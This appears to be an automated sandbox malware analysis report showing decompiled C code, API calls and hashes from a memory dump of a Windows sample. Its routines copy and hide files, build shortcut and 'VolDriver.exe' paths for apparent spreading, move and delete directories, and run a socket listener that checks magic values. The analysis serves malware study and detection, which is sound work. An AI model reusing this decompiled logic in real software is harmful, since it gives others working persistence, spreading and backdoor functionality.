                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040530c
                                                                                                                                                                                                                                                                                    0x004052dc
                                                                                                                                                                                                                                                                                    0x004052dc
                                                                                                                                                                                                                                                                                    0x00405320
                                                                                                                                                                                                                                                                                    0x00405327
                                                                                                                                                                                                                                                                                    0x0040532e
                                                                                                                                                                                                                                                                                    0x00405349
                                                                                                                                                                                                                                                                                    0x0040536f
                                                                                                                                                                                                                                                                                    0x0040538a
                                                                                                                                                                                                                                                                                    0x00405390
                                                                                                                                                                                                                                                                                    0x0040539f
                                                                                                                                                                                                                                                                                    0x004053ac
                                                                                                                                                                                                                                                                                    0x004053b2
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004053b2
                                                                                                                                                                                                                                                                                    0x00405343
                                                                                                                                                                                                                                                                                    0x00405343
                                                                                                                                                                                                                                                                                    0x004053c9
                                                                                                                                                                                                                                                                                    0x004053df
                                                                                                                                                                                                                                                                                    0x004053fd
                                                                                                                                                                                                                                                                                    0x00405424
                                                                                                                                                                                                                                                                                    0x0040542a
                                                                                                                                                                                                                                                                                    0x00405436
                                                                                                                                                                                                                                                                                    0x00405460
                                                                                                                                                                                                                                                                                    0x00405438
                                                                                                                                                                                                                                                                                    0x00405446
                                                                                                                                                                                                                                                                                    0x0040544b
                                                                                                                                                                                                                                                                                    0x0040544b
                                                                                                                                                                                                                                                                                    0x00405436
                                                                                                                                                                                                                                                                                    0x004053df
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004053c9
                                                                                                                                                                                                                                                                                    0x00405322
                                                                                                                                                                                                                                                                                    0x00405466
                                                                                                                                                                                                                                                                                    0x0040547a
                                                                                                                                                                                                                                                                                    0x00405489
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405489

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • _chkstk.NTDLL(?,00405610,?,?,?), ref: 00404FC8
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00404FFF
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040501F
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040503F
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040505F
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00405078
                                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00405088
                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080), ref: 004050C1
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 004050CE
                                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 004050DB
                                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 004050EC
                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 004050FF
                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000002), ref: 00405112
                                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 0040511F
                                                                                                                                                                                                                                                                                    • CopyFileW.KERNEL32 ref: 00405137
                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000002), ref: 0040514A
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$wsprintf$ExistsPath$Attributes$CopyCreateDeleteDirectory_chkstk
                                                                                                                                                                                                                                                                                    • String ID: $QA$%s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\VolDriver.exe$%s\*$shell32.dll$shell32.dll
                                                                                                                                                                                                                                                                                    • API String ID: 3833403615-723921974
                                                                                                                                                                                                                                                                                    • Opcode ID: bc23619f8dc30859a07966784ca3ed239acb01018f2188f41b04a5a3b5a0ba6e
                                                                                                                                                                                                                                                                                    • Instruction ID: f358d4f12602216a8cf7219611423f3e74dfa0c58bc439e6418ed54077a909fe
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bc23619f8dc30859a07966784ca3ed239acb01018f2188f41b04a5a3b5a0ba6e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2DD18175900218ABCB20DF60DC48FEA77B8FF44305F0485EAE609A6291D7B99BD4CF59
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00404E80(WCHAR* _a4, char _a8) {
                                                                                                                                                                                                                                                                                    				short _v524;
                                                                                                                                                                                                                                                                                    				struct _WIN32_FIND_DATAW _v1116;
                                                                                                                                                                                                                                                                                    				void* _v1120;
                                                                                                                                                                                                                                                                                    				short _v1644;
                                                                                                                                                                                                                                                                                    				short _v2164;
                                                                                                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                                                                                                    				void* _t60;
                                                                                                                                                                                                                                                                                    				void* _t61;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t1 =  &_a8; // 0x40544b
                                                                                                                                                                                                                                                                                    				CreateDirectoryW( *_t1, 0);
                                                                                                                                                                                                                                                                                    				wsprintfW( &_v524, L"%s\\*", _a4);
                                                                                                                                                                                                                                                                                    				_t61 = _t60 + 0xc;
                                                                                                                                                                                                                                                                                    				_t29 = FindFirstFileW( &_v524,  &_v1116);
                                                                                                                                                                                                                                                                                    				_v1120 = _t29;
                                                                                                                                                                                                                                                                                    				if(_v1120 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    					return _t29;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					goto L1;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                                                                                    					if(lstrcmpW( &(_v1116.cFileName), ".") != 0 && lstrcmpW( &(_v1116.cFileName), L"..") != 0) {
                                                                                                                                                                                                                                                                                    						wsprintfW( &_v1644, L"%s\\%s", _a4,  &(_v1116.cFileName));
                                                                                                                                                                                                                                                                                    						_t14 =  &_a8; // 0x40544b
                                                                                                                                                                                                                                                                                    						wsprintfW( &_v2164, L"%s\\%s",  *_t14,  &(_v1116.cFileName));
                                                                                                                                                                                                                                                                                    						_t61 = _t61 + 0x20;
                                                                                                                                                                                                                                                                                    						if((_v1116.dwFileAttributes & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                    							MoveFileExW( &_v1644,  &_v2164, 9);
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							E00404E80( &_v1644,  &_v2164);
                                                                                                                                                                                                                                                                                    							_t61 = _t61 + 8;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				} while (FindNextFileW(_v1120,  &_v1116) != 0);
                                                                                                                                                                                                                                                                                    				FindClose(_v1120);
                                                                                                                                                                                                                                                                                    				return RemoveDirectoryW(_a4);
                                                                                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                                                                                    0x00404e8b
                                                                                                                                                                                                                                                                                    0x00404e8f
                                                                                                                                                                                                                                                                                    0x00404ea5
                                                                                                                                                                                                                                                                                    0x00404eab
                                                                                                                                                                                                                                                                                    0x00404ebc
                                                                                                                                                                                                                                                                                    0x00404ec2
                                                                                                                                                                                                                                                                                    0x00404ecf
                                                                                                                                                                                                                                                                                    0x00404fb2
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00404ed5
                                                                                                                                                                                                                                                                                    0x00404ed5
                                                                                                                                                                                                                                                                                    0x00404ee9
                                                                                                                                                                                                                                                                                    0x00404f1a
                                                                                                                                                                                                                                                                                    0x00404f2a
                                                                                                                                                                                                                                                                                    0x00404f3a
                                                                                                                                                                                                                                                                                    0x00404f40
                                                                                                                                                                                                                                                                                    0x00404f4c
                                                                                                                                                                                                                                                                                    0x00404f76
                                                                                                                                                                                                                                                                                    0x00404f4e
                                                                                                                                                                                                                                                                                    0x00404f5c
                                                                                                                                                                                                                                                                                    0x00404f61
                                                                                                                                                                                                                                                                                    0x00404f61
                                                                                                                                                                                                                                                                                    0x00404f4c
                                                                                                                                                                                                                                                                                    0x00404f90
                                                                                                                                                                                                                                                                                    0x00404f9f
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(KT@,00000000), ref: 00404E8F
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00404EA5
                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00404EBC
                                                                                                                                                                                                                                                                                    • lstrcmpW.KERNEL32(?,0041160C), ref: 00404EE1
                                                                                                                                                                                                                                                                                    • lstrcmpW.KERNEL32(?,00411610), ref: 00404EF7
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00404F1A
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00404F3A
                                                                                                                                                                                                                                                                                    • MoveFileExW.KERNEL32(?,?,00000009), ref: 00404F76
                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(000000FF,?), ref: 00404F8A
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(000000FF), ref: 00404F9F
                                                                                                                                                                                                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00404FA9
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                                                                                                                                                                                                                    • String ID: %s\%s$%s\%s$%s\*$KT@
                                                                                                                                                                                                                                                                                    • API String ID: 92872011-1718218466
                                                                                                                                                                                                                                                                                    • Opcode ID: 4e32471b6f213224bbe50e7f945d3dfc794eb29b83275571e89e3b03adfc3a4e
                                                                                                                                                                                                                                                                                    • Instruction ID: f84c23499f796ae609c643b61d0d113fdbb715ac4c7aa211f5e11142a609d372
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e32471b6f213224bbe50e7f945d3dfc794eb29b83275571e89e3b03adfc3a4e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 553145B5500218ABCB10DFA0DC88FDA7778BB88301F0085A9F709A6195DB79DAC4CF98
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                                                                                    			E0040E400(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                                                                                                                                    				char _v68;
                                                                                                                                                                                                                                                                                    				long _v72;
                                                                                                                                                                                                                                                                                    				signed char _v80;
                                                                                                                                                                                                                                                                                    				long _v92;
                                                                                                                                                                                                                                                                                    				char _v96;
                                                                                                                                                                                                                                                                                    				char _v100;
                                                                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                                                                                                    				long _t31;
                                                                                                                                                                                                                                                                                    				long _t33;
                                                                                                                                                                                                                                                                                    				long _t34;
                                                                                                                                                                                                                                                                                    				long _t42;
                                                                                                                                                                                                                                                                                    				intOrPtr _t49;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t56;
                                                                                                                                                                                                                                                                                    				intOrPtr _t70;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t73;
                                                                                                                                                                                                                                                                                    				long _t74;
                                                                                                                                                                                                                                                                                    				intOrPtr _t75;
                                                                                                                                                                                                                                                                                    				struct _CRITICAL_SECTION* _t76;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t77;
                                                                                                                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                                                                                                                    				signed int _t79;
                                                                                                                                                                                                                                                                                    				void* _t81;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t81 = (_t79 & 0xfffffff8) - 0x44;
                                                                                                                                                                                                                                                                                    				_t31 = GetTickCount();
                                                                                                                                                                                                                                                                                    				_t56 = _a4;
                                                                                                                                                                                                                                                                                    				_v72 = _t31;
                                                                                                                                                                                                                                                                                    				_t33 = WaitForSingleObject( *(_t56 + 0x10), 1);
                                                                                                                                                                                                                                                                                    				if(_t33 == 0) {
                                                                                                                                                                                                                                                                                    					L25:
                                                                                                                                                                                                                                                                                    					return _t33;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					goto L1;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                                                                                    					_t73 = _t56 + 0x18;
                                                                                                                                                                                                                                                                                    					__imp__WSAWaitForMultipleEvents(1, _t73, 0, 0, 0);
                                                                                                                                                                                                                                                                                    					if(_t33 != 0x102) {
                                                                                                                                                                                                                                                                                    						__imp__WSAEnumNetworkEvents( *((intOrPtr*)(_t56 + 0x14)),  *_t73,  &_v68);
                                                                                                                                                                                                                                                                                    						if((_v80 & 0x00000008) != 0 && _v64 == 0 &&  *_t56 == 0x494f4350) {
                                                                                                                                                                                                                                                                                    							_t49 =  *((intOrPtr*)(_t56 + 0x14));
                                                                                                                                                                                                                                                                                    							_v100 = 0x10;
                                                                                                                                                                                                                                                                                    							__imp__#1(_t49,  &_v96,  &_v100);
                                                                                                                                                                                                                                                                                    							if(_t49 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    								_t77 = E0040DF90(_t56, _t49);
                                                                                                                                                                                                                                                                                    								_t81 = _t81 + 4;
                                                                                                                                                                                                                                                                                    								if(_t77 != 0) {
                                                                                                                                                                                                                                                                                    									_t15 = _t77 + 0x264; // 0x264
                                                                                                                                                                                                                                                                                    									E0040E220(0, _t77, _t56, _t15);
                                                                                                                                                                                                                                                                                    									_t81 = _t81 + 8;
                                                                                                                                                                                                                                                                                    									if( *((char*)(_t77 + 0x274)) == 0 &&  *_t77 == 0x69636c69) {
                                                                                                                                                                                                                                                                                    										E0040E7D0(_t77);
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t34 = GetTickCount();
                                                                                                                                                                                                                                                                                    					_t74 = _v92;
                                                                                                                                                                                                                                                                                    					if(_t34 - _t74 < 0x3e8) {
                                                                                                                                                                                                                                                                                    						if(GetTickCount() - _t74 < 0x2710) {
                                                                                                                                                                                                                                                                                    							goto L24;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						EnterCriticalSection(_t56 + 0x20);
                                                                                                                                                                                                                                                                                    						_t75 =  *((intOrPtr*)(_t56 + 0x38));
                                                                                                                                                                                                                                                                                    						if(_t75 == 0) {
                                                                                                                                                                                                                                                                                    							L23:
                                                                                                                                                                                                                                                                                    							LeaveCriticalSection(_t56 + 0x20);
                                                                                                                                                                                                                                                                                    							_v92 = GetTickCount();
                                                                                                                                                                                                                                                                                    							goto L24;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							goto L19;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                                                                    							L19:
                                                                                                                                                                                                                                                                                    							_t42 = InterlockedExchangeAdd(_t75 + 4, 0);
                                                                                                                                                                                                                                                                                    							if(E0040BE60() - _t42 >= 0x1e) {
                                                                                                                                                                                                                                                                                    								_t45 =  *((intOrPtr*)(_t75 + 0x260));
                                                                                                                                                                                                                                                                                    								if( *((intOrPtr*)(_t75 + 0x260)) != 0xffffffff) {
                                                                                                                                                                                                                                                                                    									E00409600(_t45);
                                                                                                                                                                                                                                                                                    									_t81 = _t81 + 4;
                                                                                                                                                                                                                                                                                    									 *((intOrPtr*)(_t75 + 0x260)) = 0xffffffff;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_t75 =  *((intOrPtr*)(_t75 + 0x280));
                                                                                                                                                                                                                                                                                    						} while (_t75 != 0);
                                                                                                                                                                                                                                                                                    						goto L23;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t76 = _t56 + 0x20;
                                                                                                                                                                                                                                                                                    					EnterCriticalSection(_t76);
                                                                                                                                                                                                                                                                                    					_t70 =  *((intOrPtr*)(_t56 + 0x38));
                                                                                                                                                                                                                                                                                    					if(_t70 == 0) {
                                                                                                                                                                                                                                                                                    						L16:
                                                                                                                                                                                                                                                                                    						LeaveCriticalSection(_t76);
                                                                                                                                                                                                                                                                                    						goto L24;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					while( *((intOrPtr*)(_t70 + 0x260)) != 0xffffffff) {
                                                                                                                                                                                                                                                                                    						_t70 =  *((intOrPtr*)(_t70 + 0x280));
                                                                                                                                                                                                                                                                                    						if(_t70 != 0) {
                                                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							LeaveCriticalSection(_t76);
                                                                                                                                                                                                                                                                                    							goto L24;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					E0040E300(_t56, _t70, _t78);
                                                                                                                                                                                                                                                                                    					goto L16;
                                                                                                                                                                                                                                                                                    					L24:
                                                                                                                                                                                                                                                                                    					_t33 = WaitForSingleObject( *(_t56 + 0x10), 1);
                                                                                                                                                                                                                                                                                    				} while (_t33 != 0);
                                                                                                                                                                                                                                                                                    				goto L25;
                                                                                                                                                                                                                                                                                    			}




























                                                                                                                                                                                                                                                                                    0x0040e406
                                                                                                                                                                                                                                                                                    0x0040e40c
                                                                                                                                                                                                                                                                                    0x0040e412
                                                                                                                                                                                                                                                                                    0x0040e415
                                                                                                                                                                                                                                                                                    0x0040e41f
                                                                                                                                                                                                                                                                                    0x0040e427
                                                                                                                                                                                                                                                                                    0x0040e5a9
                                                                                                                                                                                                                                                                                    0x0040e5af
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e42d
                                                                                                                                                                                                                                                                                    0x0040e42d
                                                                                                                                                                                                                                                                                    0x0040e433
                                                                                                                                                                                                                                                                                    0x0040e439
                                                                                                                                                                                                                                                                                    0x0040e444
                                                                                                                                                                                                                                                                                    0x0040e456
                                                                                                                                                                                                                                                                                    0x0040e461
                                                                                                                                                                                                                                                                                    0x0040e472
                                                                                                                                                                                                                                                                                    0x0040e480
                                                                                                                                                                                                                                                                                    0x0040e488
                                                                                                                                                                                                                                                                                    0x0040e491
                                                                                                                                                                                                                                                                                    0x0040e49b
                                                                                                                                                                                                                                                                                    0x0040e49d
                                                                                                                                                                                                                                                                                    0x0040e4a2
                                                                                                                                                                                                                                                                                    0x0040e4a4
                                                                                                                                                                                                                                                                                    0x0040e4b0
                                                                                                                                                                                                                                                                                    0x0040e4b5
                                                                                                                                                                                                                                                                                    0x0040e4bf
                                                                                                                                                                                                                                                                                    0x0040e4cb
                                                                                                                                                                                                                                                                                    0x0040e4cb
                                                                                                                                                                                                                                                                                    0x0040e4bf
                                                                                                                                                                                                                                                                                    0x0040e4a2
                                                                                                                                                                                                                                                                                    0x0040e491
                                                                                                                                                                                                                                                                                    0x0040e461
                                                                                                                                                                                                                                                                                    0x0040e4d6
                                                                                                                                                                                                                                                                                    0x0040e4d8
                                                                                                                                                                                                                                                                                    0x0040e4e3
                                                                                                                                                                                                                                                                                    0x0040e52c
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e532
                                                                                                                                                                                                                                                                                    0x0040e538
                                                                                                                                                                                                                                                                                    0x0040e53d
                                                                                                                                                                                                                                                                                    0x0040e581
                                                                                                                                                                                                                                                                                    0x0040e585
                                                                                                                                                                                                                                                                                    0x0040e591
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e53f
                                                                                                                                                                                                                                                                                    0x0040e53f
                                                                                                                                                                                                                                                                                    0x0040e545
                                                                                                                                                                                                                                                                                    0x0040e557
                                                                                                                                                                                                                                                                                    0x0040e559
                                                                                                                                                                                                                                                                                    0x0040e562
                                                                                                                                                                                                                                                                                    0x0040e565
                                                                                                                                                                                                                                                                                    0x0040e56a
                                                                                                                                                                                                                                                                                    0x0040e56d
                                                                                                                                                                                                                                                                                    0x0040e56d
                                                                                                                                                                                                                                                                                    0x0040e562
                                                                                                                                                                                                                                                                                    0x0040e577
                                                                                                                                                                                                                                                                                    0x0040e57d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e53f
                                                                                                                                                                                                                                                                                    0x0040e4e5
                                                                                                                                                                                                                                                                                    0x0040e4e9
                                                                                                                                                                                                                                                                                    0x0040e4ef
                                                                                                                                                                                                                                                                                    0x0040e4f4
                                                                                                                                                                                                                                                                                    0x0040e51a
                                                                                                                                                                                                                                                                                    0x0040e51b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e51b
                                                                                                                                                                                                                                                                                    0x0040e4f6
                                                                                                                                                                                                                                                                                    0x0040e4ff
                                                                                                                                                                                                                                                                                    0x0040e507
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e509
                                                                                                                                                                                                                                                                                    0x0040e50a
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e50a
                                                                                                                                                                                                                                                                                    0x0040e507
                                                                                                                                                                                                                                                                                    0x0040e515
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e595
                                                                                                                                                                                                                                                                                    0x0040e59b
                                                                                                                                                                                                                                                                                    0x0040e5a1
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040E40C
                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040E41F
                                                                                                                                                                                                                                                                                    • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 0040E439
                                                                                                                                                                                                                                                                                    • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 0040E456
                                                                                                                                                                                                                                                                                    • accept.WS2_32(?,?,?), ref: 0040E488
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040E4D6
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0040E4E9
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0040E50A
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0040E51B
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040E523
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0040E532
                                                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E545
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0040E585
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040E58B
                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040E59B
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                                                                                                                                                                                                                    • String ID: PCOI$ilci
                                                                                                                                                                                                                                                                                    • API String ID: 3345448188-3762367603
                                                                                                                                                                                                                                                                                    • Opcode ID: e061771aa0f445f024457eb283919c0dbd6c06df5abae74199e20b4c22fa87b5
                                                                                                                                                                                                                                                                                    • Instruction ID: 917b59bc2a3588b9956fd89eac52db2b1e6dcbcc9db4fe113c03d7dfd46bf168
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e061771aa0f445f024457eb283919c0dbd6c06df5abae74199e20b4c22fa87b5
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29413671500200ABCB209F75DC8CB9B77A9AF44714F048E3EF955A72C1EB78E891CB99
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                                                                                                                                                                    			E0040CD60(char* _a4, char* _a8, void* _a12, long* _a16) {
                                                                                                                                                                                                                                                                                    				char _v260;
                                                                                                                                                                                                                                                                                    				char _v772;
                                                                                                                                                                                                                                                                                    				char* _v776;
                                                                                                                                                                                                                                                                                    				void* _v780;
                                                                                                                                                                                                                                                                                    				intOrPtr _v792;
                                                                                                                                                                                                                                                                                    				char* _v796;
                                                                                                                                                                                                                                                                                    				signed short _v816;
                                                                                                                                                                                                                                                                                    				intOrPtr _v820;
                                                                                                                                                                                                                                                                                    				char* _v824;
                                                                                                                                                                                                                                                                                    				void _v836;
                                                                                                                                                                                                                                                                                    				void* _v840;
                                                                                                                                                                                                                                                                                    				void* _v844;
                                                                                                                                                                                                                                                                                    				void* _v848;
                                                                                                                                                                                                                                                                                    				char* _v852;
                                                                                                                                                                                                                                                                                    				long _v856;
                                                                                                                                                                                                                                                                                    				void _v1884;
                                                                                                                                                                                                                                                                                    				long _v1888;
                                                                                                                                                                                                                                                                                    				void* _t102;
